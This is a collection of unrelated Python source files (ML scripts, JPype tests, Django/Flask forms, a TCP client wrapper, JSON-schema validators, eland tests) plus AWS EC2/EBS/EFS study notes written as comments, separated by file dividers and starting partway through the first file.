        "dataset.name = '%s'" %(FLAGS.dataset),
        "train_pca.random_seed = 0",
        "train_pca.num_pca_components = [10000]", #[100, 500, 1000, 2000, 4000]",
    ]
    pca.train_pca_with_gin(
        model_path, FLAGS.overwrite, gin_bindings=gin_bindings)
    print("\n\n*- Training COMPLETED \n\n")
def create_pca_holdout_split(unused_argv):
    """Create a fixed 5000-sample holdout split for PCA evaluation."""
    print("\n\n*- Preprocessing '%s' \n\n" %(FLAGS.dataset))
    preproces_gin_bindings = [
        "dataset.name = '%s'" %(FLAGS.dataset),
        "preprocess.preprocess_fn = @pca_split_holdout",
        "pca_split_holdout.random_seed = 0",
        "pca_split_holdout.split_size = 5000"
    ]
    preprocess.preprocess_with_gin(FLAGS.dataset,
                                   "dummy_name",
                                   overwrite=FLAGS.overwrite,
                                   gin_config_files=None,
                                   gin_bindings=preproces_gin_bindings)
    print("\n\n*- Preprocessing DONE \n\n")
if __name__ == "__main__":
# app.run(create_pca_holdout_split)
app.run(main_per_dataset)
|
# *****************************************************************************
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# See NOTICE file for details.
#
# *****************************************************************************
import jpype
import common
import subrun
import os
import sys
import unittest
def runStartJVM(*args, **kwargs):
    """Start a JVM in the subrun subprocess with the given arguments."""
    jpype.startJVM(*args, **kwargs)
def runStartJVMTest(*args, **kwargs):
    """Start a JVM and verify the test classpath was applied.

    Raises RuntimeError if ``jpype.array.TestArray`` cannot be loaded, which
    indicates the classpath arguments did not take effect.
    """
    jpype.startJVM(*args, **kwargs)
    try:
        # Loading succeeds only when the test classes are on the classpath.
        # (The unused `jclass` binding was dropped.)
        jpype.JClass('jpype.array.TestArray')
        return
    except Exception:
        # BUGFIX: narrowed from a bare `except:` so KeyboardInterrupt and
        # SystemExit are no longer swallowed.
        pass
    raise RuntimeError("Test class not found")
# Classpath to the compiled test classes, with forward slashes for the JVM.
root = os.path.dirname(os.path.abspath(os.path.dirname(__file__)))
cp = os.path.join(root, 'classes').replace('\\', '/')
@subrun.TestCase(individual=True)
class StartJVMCase(unittest.TestCase):
    """Tests for jpype.startJVM argument handling (each run in its own subprocess)."""

    def setUp(self):
        self.jvmpath = jpype.getDefaultJVMPath()

    def testStartup(self):
        # Starting the JVM twice in one process must fail.
        with self.assertRaises(OSError):
            jpype.startJVM(convertStrings=False)
            jpype.startJVM(convertStrings=False)

    def testRestart(self):
        # Restarting after shutdown is unsupported and must fail.
        with self.assertRaises(OSError):
            jpype.startJVM(convertStrings=False)
            jpype.shutdownJVM()
            jpype.startJVM(convertStrings=False)

    def testJVMPathKeyword(self):
        runStartJVM(jvmpath=self.jvmpath)

    def testInvalidArgsFalse(self):
        # Unknown JVM options raise when ignoreUnrecognized is False...
        with self.assertRaises(RuntimeError):
            runStartJVM("-for_sure_InVaLiD",
                        ignoreUnrecognized=False, convertStrings=False)

    def testInvalidArgsTrue(self):
        # ...and are silently ignored when ignoreUnrecognized is True.
        runStartJVM("-for_sure_InVaLiD",
                    ignoreUnrecognized=True, convertStrings=False)

    def testClasspathArgKeyword(self):
        runStartJVMTest(classpath=cp, convertStrings=False)

    def testClasspathArgList(self):
        runStartJVMTest(classpath=[cp], convertStrings=False)

    def testClasspathArgListEmpty(self):
        # Empty entries in a classpath list are tolerated.
        runStartJVMTest(classpath=[cp, ''], convertStrings=False)

    def testClasspathArgDef(self):
        runStartJVMTest('-Djava.class.path=%s' % cp, convertStrings=False)

    def testClasspathTwice(self):
        # Classpath may not be given both as a -D option and as a keyword.
        with self.assertRaises(TypeError):
            runStartJVMTest('-Djava.class.path=%s' %
                            cp, classpath=cp, convertStrings=False)

    def testClasspathBadType(self):
        with self.assertRaises(TypeError):
            runStartJVMTest(classpath=1, convertStrings=False)

    def testPathArg(self):
        runStartJVMTest(self.jvmpath, classpath=cp, convertStrings=False)

    def testPathKeyword(self):
        path = jpype.getDefaultJVMPath()
        runStartJVMTest(classpath=cp, jvmpath=self.jvmpath,
                        convertStrings=False)

    def testPathTwice(self):
        # JVM path may not be given both positionally and as a keyword.
        with self.assertRaises(TypeError):
            jpype.startJVM(self.jvmpath, jvmpath=self.jvmpath)

    def testBadKeyword(self):
        with self.assertRaises(TypeError):
            jpype.startJVM(invalid=True)
|
from socket import socket, AF_INET, SOCK_STREAM
class TCPClient():
    """Thin wrapper around a blocking TCP stream socket."""

    def __init__(self, ip, port, bufsize=1024):
        """Prepare (but do not open) a connection to ip:port."""
        self.ip, self.port, self.bufsize = ip, port, bufsize
        self.client = socket(AF_INET, SOCK_STREAM)
        self.RUN = True  # flag for callers that drive a receive loop

    def start(self):
        """Open the TCP connection."""
        self.client.connect((self.ip, self.port))

    def send(self, data):
        """Send raw bytes over the socket."""
        self.client.send(data)

    def recv(self):
        """Receive up to `bufsize` bytes (blocking)."""
        return self.client.recv(self.bufsize)

    def close(self):
        """Close the underlying socket."""
        self.client.close()
import warnings
warnings.filterwarnings('ignore')
import sys
import random
import numpy as np
from sklearn import linear_model, cross_validation, metrics, svm
from sklearn.metrics import confusion_matrix, precision_recall_fscore_support, accuracy_score
from sklearn.ensemble import RandomForestClassifier
from sklearn.preprocessing import StandardScaler
import pandas as pd
import matplotlib.pyplot as plt
%matplotlib inline
import pydoop.hdfs as hdfs
def read_csv_from_hdfs(path, cols, col_types=None):
    """Read every file under an HDFS path and concatenate them into one DataFrame.

    path: HDFS directory to list; cols: column names to assign;
    col_types: optional dtype mapping forwarded to pd.read_csv.
    """
    files = hdfs.ls(path);
    pieces = []
    for f in files:
        fhandle = hdfs.open(f)
        pieces.append(pd.read_csv(fhandle, names=cols, dtype=col_types))
        fhandle.close()
    return pd.concat(pieces, ignore_index=True)
# read files
# NOTE(review): this cell is Python 2 (print statements below) and relies on
# old scikit-learn (`cross_validation` import above, min_samples_split=1).
cols = ['delay', 'month', 'day', 'dow', 'hour', 'distance', 'carrier', 'dest', 'days_from_holiday']
col_types = {'delay': int, 'month': int, 'day': int, 'dow': int, 'hour': int, 'distance': int,
             'carrier': str, 'dest': str, 'days_from_holiday': int}
data_2014 = read_csv_from_hdfs('/home/paven/Bigdata/Project/Data_2014', cols, col_types)
data_2015 = read_csv_from_hdfs('/home/paven/Bigdata/Project/Data_2015', cols, col_types)

# Create training set (2014) and test set (2015); label = delayed 15+ min.
cols = ['month', 'day', 'dow', 'hour', 'distance', 'days_from_holiday']
train_y = data_2014['delay'] >= 15
train_x = data_2014[cols]
test_y = data_2015['delay'] >= 15
test_x = data_2015[cols]
print train_x.shape

from sklearn.ensemble import ExtraTreesClassifier

# Create Random Forest classifier with 50 trees
# NOTE(review): despite the comment, this is an ExtraTreesClassifier.
clf_etc = ExtraTreesClassifier(n_estimators=50, max_depth=None, min_samples_split=1, random_state=0, n_jobs=-1)
clf_etc.fit(train_x, train_y)

# Evaluate on test set
pr = clf_etc.predict(test_x)

# print results
cm = confusion_matrix(test_y, pr)
print "<------- ExtraTreesClassifier -------->"
print "Confusion matrix:"
print pd.DataFrame(cm)
report_svm = precision_recall_fscore_support(list(test_y), list(pr), average='binary')
print "\n[-] Precision = %0.2f\n[-] Recall = %0.2f\n[-] F1 score = %0.2f\n[-] Accuracy = %0.2f" % \
    (report_svm[0], report_svm[1], report_svm[2], accuracy_score(list(test_y), list(pr)))
print "<-------------------------------------->\n"
|
import numpy as np
class FaceData:
    """Bundles per-frame face-pipeline state: detection, recognition, results."""

    class DetectionData():
        """Detector output: tracker ids, bounding boxes, scores, threshold."""

        def __init__(self):
            self.tracker_ids = np.asarray([])
            self.bbs = np.asarray([])
            self.scores = np.asarray([])
            self.score_thresh = 0.0

    class RecognitionData():
        """Recognizer output: per-match scores, identities, tracker ids."""

        def __init__(self):
            self.score_thresh = 0.0
            self.scores = np.asarray([])
            self.persons = np.asarray([])
            self.tracker_ids = []

    class ResultData:
        """Fused final results, kept as plain lists."""

        def __init__(self):
            self.bbs = []
            self.persons = []
            self.scores = []

    def __init__(self):
        # One fresh sub-container per pipeline stage.
        self.detection_data = self.DetectionData()
        self.recognition_data = self.RecognitionData()
        self.results_data = self.ResultData()
class ImageData:
    """Holds the current capture frame and its geometry."""

    def __init__(self):
        self.TYPE = 'Webcam'        # capture source label
        self.image_np = ()          # latest frame; empty tuple until first capture
        self.isInit = False         # set True once a frame has been stored
        self.width = self.height = None  # frame size, unknown until init
|
def gree(name):
    """Print a greeting for *name* (task-performing function; returns None)."""
    greeting = f"hello {name}"
    print(greeting)
'''
We have two types of functions:
1. perform a task (e.g., greet and print are functions which perform a task)
2. return a value (e.g., round(1.9) is a function which returns a value)
If you print the result of a task-performing function, you get None,
but printing a value-returning function shows the value it returns.
'''
# Example of a value-returning function.
def get_greet(name):
    """Return the greeting value for *name*."""
    return "{}".format(name)
message = get_greet('Amir')

# BUGFIX: the original called file.open(message), which raises AttributeError
# (file objects have no .open method) and also never closed the file.
# Write the message and let the context manager close the handle.
with open('content.txt', 'w') as out_file:
    out_file.write(message)
|
from flask_wtf import FlaskForm
from wtforms import StringField, IntegerField
from wtforms import validators
from wtforms.fields.core import BooleanField
from wtforms.validators import InputRequired, Optional, URL
class AddPetForm(FlaskForm):
    '''Form for adding a new furry little friend, or maybe a reptile friend too!'''

    name = StringField("Pet Name", validators=[InputRequired()])
    species = StringField("Pet Species", validators=[InputRequired()])
    photo_url = StringField("Pet Photo (online link)", validators=[InputRequired(), URL()])
    age = IntegerField("Age", validators=[InputRequired()])
    # BUGFIX: the validator list contained Optional() twice; one suffices.
    notes = StringField("Pet Bio", validators=[Optional()])
    available = BooleanField("Available?")
class EditPetForm(FlaskForm):
    '''Form for editing pet info'''

    photo_url = StringField("Pet Photo (online link)", validators=[InputRequired(), URL()])
    # BUGFIX: the validator list contained Optional() twice; one suffices.
    notes = StringField("Pet Bio", validators=[Optional()])
    available = BooleanField("Available?")
from datetime import datetime
from model_mommy.recipe import Recipe
from django.contrib.gis.geos import Point, Polygon
from catamidb.models import AUVDeployment, DOVDeployment, BRUVDeployment, TVDeployment, TIDeployment, Pose
# All recipes share the same fixture values; build them with helpers so each
# recipe still receives fresh Point/Polygon/datetime instances. The
# module-level recipe names are unchanged.

def _pose_recipe():
    """Return a Pose recipe at the standard test position/depth."""
    return Recipe(
        Pose,
        position=Point(12.4604, 43.9420),
        depth=27.5,
        date_time=datetime.now()
    )


def _deployment_recipe(model):
    """Return a deployment recipe for *model* with the standard test values."""
    return Recipe(
        model,
        start_position=Point(12.4604, 43.9420),
        end_position=Point(12.4604, 43.9420),
        start_time_stamp=datetime.now(),
        end_time_stamp=datetime.now(),
        min_depth=10.0,
        max_depth=50.0,
        transect_shape=Polygon(((0.0, 0.0),
                                (0.0, 50.0),
                                (50.0, 50.0),
                                (50.0, 0.0),
                                (0.0, 0.0)))
    )


pose1 = _pose_recipe()
pose2 = _pose_recipe()
pose3 = _pose_recipe()

auvdeployment1 = _deployment_recipe(AUVDeployment)
auvdeployment2 = _deployment_recipe(AUVDeployment)
auvdeployment = _deployment_recipe(AUVDeployment)
dovdeployment = _deployment_recipe(DOVDeployment)
bruvdeployment = _deployment_recipe(BRUVDeployment)
tvdeployment = _deployment_recipe(TVDeployment)
tideployment = _deployment_recipe(TIDeployment)
|
#!/usr/bin/env python
# Python 2 script: for each chrX peak position (BED-like file in argv[1])
# that falls inside the first region of "out.heat", report the bin with the
# highest log(observed/expected) enrichment.
import h5py
import numpy as np
import sys
# NOTE(review): `file` shadows the builtin and the HDF5 handle is never closed.
file = h5py.File("out.heat")
# print file.keys()
counts = file['0.counts'][...]             # observed contact counts (matrix)
expected_counts = file['0.expected'][...]  # expected counts under background model
positions = file['0.positions'][...]       # per-bin genomic intervals; m[0]/m[1] used as (start, end)
regions = file['regions'][...]
start = regions[0][4]  # assumes columns 4/5 are the region's start/end — TODO confirm
end = regions[0][5]
# Collect peak positions on chrX that fall strictly inside [start, end].
peak_list = []
for line in open(sys.argv[1]):
    line = line.rstrip("\r\n").split("\t")
    if line[0] == "chrX" and int(line[1]) > start and int(line[1]) < end:
        peak_list.append(int(line[1]))
# log(observed/expected) enrichment; only cells with counts > 0 are filled —
# the remaining entries of the 1039x1039 np.empty matrix are uninitialized garbage.
where = np.where(counts > 0 )
enrichment = np.empty([1039,1039])
enrichment[where] = np.log(counts[where]/expected_counts[where])
for i in peak_list:
    highest_enriched = 0
    for num, m in enumerate(positions):
        if i > m[0] and i < m[1]:
            # Scan the whole row of the peak's bin for its strongest interactor.
            for column in range(0,len(positions)):
                if enrichment[num][column] > highest_enriched:
                    highest_enriched = enrichment[num][column]
                    interactor_pos = positions[column]
            # NOTE(review): if no cell beats 0, interactor_pos is unbound here (NameError).
            print i, m, interactor_pos, highest_enriched
|
from datetimewidget.widgets import DateTimeWidget
from django import forms
# class UserRegistrationForm(forms.Form):
# phone_number = forms.CharField(
# required = True,
# label = '',
# max_length = 32
# )
# first_name = forms.CharField(
# required = True,
# label = 'Email',
# max_length = 32,
# )
# last_name = forms.CharField(
# required = True,
# label = 'Password',
# max_length = 32,
# widget = forms.PasswordInput()
# )
# type = forms.ChoiceField()
from django.contrib.auth.forms import AuthenticationForm
from django.forms import ModelForm, SelectDateWidget
from worker.models import User, WorkerProfile, WorkerSkill, ContractorProfile, HireWorker
class UserRegistrationForm(ModelForm):
    """Signup form backed by the User model with a write-only password field."""
    # Not listed in Meta.fields, so the view must read/hash it explicitly.
    password = forms.CharField(label='Password', widget=forms.PasswordInput)

    class Meta:
        model = User
        fields = ['first_name', 'last_name', 'type', 'phone_number', 'email']
class LoginForm(forms.Form):
    """Login by 10-15 digit phone number plus password."""
    phone_number = forms.RegexField(regex=r'^\d{10,15}$', error_messages={
        'invalid': ("please enter valid mobile number"),
        # NOTE(review): 'unique' is a model-level error key; a form RegexField
        # never raises it, so this message is likely dead — confirm before removing.
        'unique': ("My message for unique") # <- THIS
    })
    password = forms.CharField(label = 'password', widget = forms.PasswordInput)
class ProfileForm(ModelForm):
    """Worker profile edit form; `user` is set by the view, not the form."""
    # Override the default widget to get a fixed-size textarea.
    about = forms.CharField(widget = forms.Textarea({'cols': '30', 'rows': '10'}))

    class Meta:
        model = WorkerProfile
        exclude = ('user',)
class ContractorProfileForm(ModelForm):
    """Contractor profile edit form; `user` is supplied by the view."""
    class Meta:
        model = ContractorProfile
        exclude = ('user',)
class WorkerSkillForm(ModelForm):
    """Form for a worker's skill entry; workflow fields are view-managed."""
    class Meta:
        model = WorkerSkill
        exclude =('user', 'hired_by','status')
        widgets = {
            # Use localization and bootstrap 3
            # NOTE(review): only applies if the model actually has a
            # 'datetime' field — confirm the key matches a field name.
            'datetime': DateTimeWidget(attrs={'id': "from_date"}, usel10n=True, bootstrap_version=3)
        }
class HireSkillForm(ModelForm):
    """Hire-request form: pick a from/to date range with dropdown selectors."""
    to_date = forms.DateField(
        widget=SelectDateWidget(
            empty_label=("Choose Year", "Choose Month", "Choose Day"),
        ),
    )
    from_date = forms.DateField(
        widget=SelectDateWidget(
            empty_label=("Choose Year", "Choose Month", "Choose Day"),
        ),
    )

    class Meta:
        model = HireWorker
        fields =('from_date', 'to_date')
|
__author__ = 'izaac'
import validictory
import json
import requests
# Validator following the http://json-schema.org guidelines using the python validictory library
# This is for integration and acceptance test
# JSON schemas (http://json-schema.org style) for response-shape validation
# with validictory.
# Shape of /user/<username>/following: list of {username, id} objects.
schema_following = {
    "type": "object",
    "properties": {
        "user_is_following": {
            "type": "array",
            "items": [
                {"type": "object",
                 "properties": {
                     "username": {"type": "string"},
                     "id": {"type": "integer"}
                 }
                 }
            ]
        }
    }
}
# Shape of the followers list: same element shape, different top-level key.
schema_followers = {
    "type": "object",
    "properties": {
        "its_followers": {
            "type": "array",
            "items": [
                {"type": "object",
                 "properties": {
                     "username": {"type": "string"},
                     "id": {"type": "integer"}
                 }
                 }
            ]
        }
    }
}
# Generic single-message payload: {"message": "<String>"}.
schema_message = {
    "type": "object",
    "properties": {
        "message": {"type": "string"}
    }
}
# Known validictory module issue about the _data is not of type object
# https://github.com/sunlightlabs/validictory/issues/49
# TODO: Follow up bug for validation/regression
# Shape of /user/<username>: messages with text and a [date, time] pair.
schema_twitt = {
    "type": "object",
    "properties": {
        "messages": {
            "type": "array",
            "items": [
                {"type": "object",
                 "properties": {
                     "text": {"type": "string"},
                     "pub_date": {
                         "type": "array",
                         "items": [
                             {"type": "string"},
                             {"type": "string"}
                         ]
                     }
                 }
                 }
            ]
        }
    }
}
def validate_json():
    """Fetch the /following endpoint and validate the response shape.

    Python 2 code (uses the `except ValueError, error` syntax).
    NOTE(review): validictory.validate() receives r.content, the raw response
    string — it most likely needs json.loads(r.content) first; confirm.
    """
    headers = {'content-type': 'application/json'}
    #test following
    r = requests.get('http://127.0.0.1:5000/user/user1/following?key=d5ef19c2b1714f87e0042e4f822bf722b30239f7',
                     headers=headers)
    try:
        validictory.validate(r.content, schema_following)
    except ValueError, error:
        print error
########################################################
# /user/<username>/following
# {
# "its_followers": [
# {
# "username": "user8",
# "id": 8
# }
# ]
# }
#json_followers = json.loads('{"its_followers": [{"username": "user8", "id": 8}]}')
########################################################
# Generic json message
# {
# "message": "<String>"
# }
#json_message = json.loads('{"message": "You can\'t follow user2"}')
########################################################
# /user/<username>
# {
# "messages": [
# {
# "text": "example message",
# "pub_date": [
# "2013-05-08",
# "07:59:13"
# ],
# "message_id": 98,
# "user_id": 3
# }
# }
#
# dump_twitt = json.dumps('{"messages": [ { "text": "example text", \
# "pub_date": ["2013-05-08", "07:59:13" ], \
# "message_id": 98, "user_id": 3 }}')
# json_twitt = json.loads(dump_twitt)
#
#
# try:
# validictory.validate(json_twitt, schema_twitt)
# except ValueError, error:
# print error
|
"""
https://www.hackerrank.com/challenges/reduced-string/problem
string s: a string to reduce
"""
def superReducedString(s):
    """Repeatedly delete adjacent pairs of equal characters from *s*.

    https://www.hackerrank.com/challenges/reduced-string/problem

    Args:
        s (str): the string to reduce.

    Returns:
        str: the fully reduced string, or "Empty String" if nothing remains
        (including the case where *s* is already empty, for consistency).
    """
    # Single O(n) pass with a stack: each character cancels the previous one
    # when they match, otherwise it is kept. (The original restarted the scan
    # from index 0 after every deletion, which is O(n^2) in the worst case.)
    stack = []
    for ch in s:
        if stack and stack[-1] == ch:
            stack.pop()
        else:
            stack.append(ch)
    return "".join(stack) if stack else "Empty String"
|
# coding: utf-8
# # EC2
#
# * EC2 stands for Elastic Compute Cloud
#
# * web service that provides resizable compute capacity in the cloud.
# * reduce time req to obtain, boot new server to minutes
# * allows quick scale in capacity both up and down and requirements change.
#
# * what is it? It is a virtual linux|windows server
#
# * Startups now do not require dollars for hardware, they can experiment!
#
# * allow you to pay only for the capacity that you actually use.
# * provides dev the tools to build failure resilient applications and isolate themselves from common failure scenarios
#
# ## EC2 Options
#
# * __On Demand__ allow you to pay fixed rate by hour or second with no commitment
# * users want low cost, flexibility of ec2 without up front payment or commitment
# * apps with short term, spiky or unpredictable workloads that cannot be interrupted
# * apps developed or tested on ec2 for first time
#
# * __reserved__ provide you with capacity reservation, offer significant discount on hourly charge, 1 year or 3 year terms.
# * steady state or predictable usage
# * apps that require reserved capacity
# * user able to make up front payments to reduce compute costs even further
# * standard RI (up to 75% discount) RI = reserved instance;
# * convertible RI ( up to 54% discount) capability to change attributes of RI as long as the exchange results in the creation of RI of equal or greater value
# * scheduled RI's available to launch within timeframe you reserve. Match capacity to predictable recurring schedule (eg batch jobs)
#
# * __spot__ bid whatever price you want for instance capacity, providing for even greater savings if your applications have flexible start and end times. You set your bid price (how much you are willing pay), if the price goes above your price, your machine shuts down. If below, then your machine fires up!
# * flexible start/end times
# * apps that are only feasible at very low compute prices
# * users with urgent computing needs for large amounts of additional capacity
# * if you terminate instance before hour is complete, you pay for whole hour anyway.
# * if amazon terminates instance, you get the hour it was terminated in for free! :)
#
# * __Dedicated Hosts__ physical ec2 server dedicated for your use. reduce cost by allowing you to use your existing server-bound software licenses.
# * useful for regulatory req that doesn't support multi tenant virtualization
# * great for licensing that doesn't support multi tenant v.
# * can be purchased on-demand (hourly)
# * can be purchased as a reservation for up to 70% off the on demand price.
#
#
# Letter is type, Number is generation
#
# eg D for Dense, 2 for 2nd generation!
#
#
# | Family | Speciality | Use Case |
# | --- | --- | --- |
# | d2 | Dense Storage | Fileservers / Data Warehouse|
# | r4 | Memory Optimized | Mem intensive apps (r = ram)|
# | m4 | General Purpose | Application Servers (m = main choice)|
# | c4 | Compute Optimized | CPU intensive |
# | g2 | Graphics intensive| video encoding/3d app streaming|
# | i2 | High Speed Storage | nosql, data warehouse (i = iops)|
# | f1 | field programmable gate array | hardware accelerate your code |
# | t2 | low cost general purpose | web servers/ small db (t= tiny) |
# | p2 | graphics / general purpose GPU | machine learning, bit coin mining |
# | x1 | memory optimized| SAP Hana/Apache Spark/etc (x=extreme memory)|
#
#
# ##### ec2 intance types
# * d - density
# * r - ram
# * m - main choice
# * c - compute
# * g - graphics
# * i - iops
# * f - fpga
# * t - tiny general purpose
# * p - graphics
# * x - extreme memory
#
# dr mc gift px
#
#
#
# # EBS
# __ebs__ allows you to
# * create storage volumes and attach them to ec2 instance
# * create file system on that volume
# * they are placed in a specific availability zone where they are automatically replicated to protect from failure of a single component.
# * block based storage (so can install OS, DB, etc), not file based like S3
#
# * you cannot mount 1 EBS volume to multiple EC2 instances, instead use EFS
#
# ### EBS Volume Types
# * 4 or 5 of them
# * General Purpose SSD (GP2)
# * balance price and performance
# * 3 IOPS per gig, up to 10,000 IOPS; ability to burst up to 3000 IOPS for extended periods of time for volumes at 3334 GiB and above
# * Provisioned IOPS SSD (IO1)
# * IO intensive apps like large db or nosql db
# * use if need more than 10,000 IOPS
# * up to 20,000 IOPS
# * Throughput Optimized HDD (ST1)
# * old style hard drive (magnetic)
# * big data
# * data warehouse
# * log processing
# * cannot be a boot volume
# * Cold HDD (SC1)
# * lowest cost storage for infrequence accessed workloads
# * file server
# * not boot volume
# * magnetic (standard)
# * lowest cost per gig that is bootable. mag vol ideal for workloads where data is access infrequently, apps where lowest storage cost is important
#
#
# ## Launch EC2 - ec2 lab 101
# Two types of virtualization
# * HVM hyper virtual machine
# * PVM Para virtual machine NFI what the difference is.
#
# Launch
# * select Amazon Linux AMI (HVM), includes bunch of stuff including aws cli)
# * subnet: one subnet = one availability zone, a subnet cannot cross av. zones.
# * In Advanced Details > User Data: can add details like download and install anaconda, install product x, etc.
# * Security Groups === Firewall
#
# * Connect to EC2
# ```
# ssh -i "cloudops_training.pem" ec2-user@ec2-13-54-65-78.ap-southeast-2.compute.amazonaws.com
# ```
#
# * Install Apache
# ```
# yum update
# yum install httpd
# cd /var/www/html
# vi index.html
# <html><h1>Hello Cloud Gurus!</h1></html>
# :wq
# service httpd start
# chkconfig httpd on # start httpd on boot.
# ```
# * Navigate on web browser to public name, and web page will start!
# * EC2 Console
#
# * System Status Check - verifies that the hardware to connect to your virtual machine is ok.
# * Instance Status Check - verifies that your machine is ok.
# * Reserved Instances
# * select reserved instance from menu
# * select options
# * review costs
# Note:
# * Termination Protection is turned off by default, you must turn it on
# * on EBS instance, default actions if for root EBS vol to be deleted when instance is terminated.
# * EBS root vol of DEFAULT ami cannot be encrypted.
# * can use 3rd party tools to encrypt (eg bit locker on windows)
# * create your own AMI, in process - encrypt root vol.
# * Additional volumes can be encrypted.
# ## PUTTY and PUTTYKeyGen
# * when creating an EC2, save PEM file
# * use puttykeygen to convert PEM to PPK
# * save PPK file into putty config
# * good to go!
# ## Security Groups
#
# * From security Groups on AWS console
# * any change is applied immediately
# * if remove HTTP from a rule, then HTTP is no longer available.
#
# * Rules are STATEFUL
# * if you allow something IN, then it is automatically allowed back out.
# * you can remove the rules for OUTBOUND, and everything still works.
# * ssh session freezes though
#
# * Everything is deny by default.
# * can add multiple security groups to a single machine, they are cumulative.
# * there is no deny, so cannot be a conflict.
#
# * NACL are STATELESS (inbound does not allow outbound). NACL network access control list
# * cannot block using SG, need to use NACL
# ## Storage
# ---
#
# * create an EC2 with a bunch of different storage types
# * navigate to volumes
# * select gp2 (boot volume)
# * actions > create snapshot
# * Once created, navigate to snapshots, then you can create a volumn from a snapshot
# * you can determine the availability zone it should reside in
# * you can change the volume type (SSD, Cold HDD, etc)
# ---
# * more in snapshots
# * copy - can copy a snapshot to anywhere in the world (ie change region).
# * so, to move an instance from one region to another
# * create snapshot
# * copy snapshot to other region
# * create image from snapshot
# * create ec2 from volume
#
# ---
# * To create a new image:
# * create snapshot
# * select snapshot, actions > create image
# * navigate to Images > AMI (takes a while to show up)
#
# ---
# * NOTE: if create image from snapshot from machine with multiple disks, it fucks up.
# * instead, create image from working machine and in the process, remove the extra disks
# * running machine > actions > create image > remove extra disks > go
#
# ---
# * NOTE2: when terminating (deleting) instances, only the root volume is removed. Any other volume needs to be manually removed from the volume tab.
#
# ---
# * Volumes exist on EBS - they are just a virtual hard disk
# * root devise is where OS installed
# * snapshot exist on S3 (but it is not visible)
# * snapshot is a point in time of volume
# * after time, next snap is just the diff from the prev snap.
#
# * to backup a EBS root vol, should probably stop instance first.
# * but you can take a snap while running
# * create AMI from volume or snapshot
# * can change EBS vol size on fly... and also change storage type on the fly
# * volumes always in the same availability zone as the ec2
# ---
# * snapshots of encrypted vol are encrypted automatically
# * vol restored from encrypted snapshot are encrypted automatically
# * you can share snapshot, but only if unencrypted
# * snapshot can be shared with other aws accounts, or made public.
# ---
#
#
#
# ## EFS - Elastic File System
# ---
# * file storage for Elastic compute Cloud (EC2)
# * create and configure file systems quickly
# * storage is elastic, grow and shrink automagically as you add/remove files
# ---
# * support NFSv4 - Network File System ver 4
# * only pay for what you use (no pre-provisioning)
# * scale up to petabyte
# * can support thousands of concurrent NFS connections
# * data is stored across multiple AZ within a region
# * block based storage (not object based storage), can share with other ec2 instances
# * Read after Write consistency
#
# ### Setup Web Server with load balancing
# * Navigate to EFS > create filesystem > defaults and Tags > Create
# * Create 2 EC2 instances with httpd installed, on each, set the subnet to a different AZ
# * check that EC2 instances are in same security group as the EFS
# * Create a Load Balancer > give it a name > default VPC > Security Group > Add in both EC2 instances
# * Install httpd on both, and start
# * verify /var/www/html is empty on both machines
# * Navigate back to EFS > Select your EFS > click on "ec2 mount instructions". Most of the software has already been installed...just need the last command.
# * sudo mount -t nfs $(curl -a http://x.x.x.x/latest/meta-data/placement/availability-zone).fs...com:/ efs
# * default is to mount onto /efs (last part of command above)
# * change to sudo mount -t nfs $(curl -a http://x.x.x.x/latest/meta-data/placement/availability-zone).fs...com:/ /var/www/html
# * create index.html with stuff in it
# * go to Load Balancer > instances > check health - should be "in service"
# * description tab gives DNS name, navigate to there, should be your web page!
|
# Licensed to Elasticsearch B.V. under one or more contributor
# license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright
# ownership. Elasticsearch B.V. licenses this file to you under
# the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import pytest
# File called _pytest for PyCharm compatability
from tests.common import TestData
class TestDataFrameDrop(TestData):
    """Tests for eland DataFrame.drop(): argument combinations and error cases."""

    def test_drop(self, df):
        # Exercise every supported way of naming columns/rows to drop.
        # NOTE(review): no explicit asserts here — presumably the `df` fixture
        # checks eland-vs-pandas parity internally; confirm.
        df.drop(labels=["Carrier", "DestCityName"], axis=1)
        df.drop(columns=["Carrier", "DestCityName"])
        df.drop(["1", "2"])
        df.drop(labels=["1", "2"], axis=0)
        df.drop(index=["1", "2"])
        df.drop(labels="3", axis=0)
        df.drop(columns="Carrier")
        df.drop(columns=["Carrier", "Carrier_1"], errors="ignore")
        df.drop(columns=["Carrier_1"], errors="ignore")

    def test_drop_all_columns(self, df):
        # Dropping every column must leave a zero-width frame, whichever
        # calling convention is used.
        all_columns = list(df.columns)
        rows = df.shape[0]
        for dropped in (
            df.drop(labels=all_columns, axis=1),
            df.drop(columns=all_columns),
            df.drop(all_columns, axis=1),
        ):
            assert dropped.shape == (rows, 0)
            assert list(dropped.columns) == []

    def test_drop_all_index(self, df):
        # Dropping every row must leave a zero-height frame.
        all_index = list(df.pd.index)
        cols = df.shape[1]
        for dropped in (
            df.drop(all_index),
            df.drop(all_index, axis=0),
            df.drop(index=all_index),
        ):
            assert dropped.shape == (0, cols)
            assert list(dropped.to_pandas().index) == []

    def test_drop_raises(self):
        # Invalid argument combinations must raise ValueError with the
        # pandas-compatible messages asserted below.
        ed_flights = self.ed_flights()
        with pytest.raises(
            ValueError, match="Cannot specify both 'labels' and 'index'/'columns'"
        ):
            ed_flights.drop(
                labels=["Carrier", "DestCityName"], columns=["Carrier", "DestCityName"]
            )
        with pytest.raises(
            ValueError, match="Cannot specify both 'labels' and 'index'/'columns'"
        ):
            ed_flights.drop(labels=["Carrier", "DestCityName"], index=[0, 1, 2])
        with pytest.raises(
            ValueError,
            match="Need to specify at least one of 'labels', 'index' or 'columns'",
        ):
            ed_flights.drop()
        with pytest.raises(
            ValueError,
            match="number of labels 0!=2 not contained in axis",
        ):
            ed_flights.drop(errors="raise", axis=0, labels=["-1", "-2"])
        with pytest.raises(ValueError) as error:
            ed_flights.drop(columns=["Carrier_1"], errors="raise")
        assert str(error.value) == "labels ['Carrier_1'] not contained in axis"
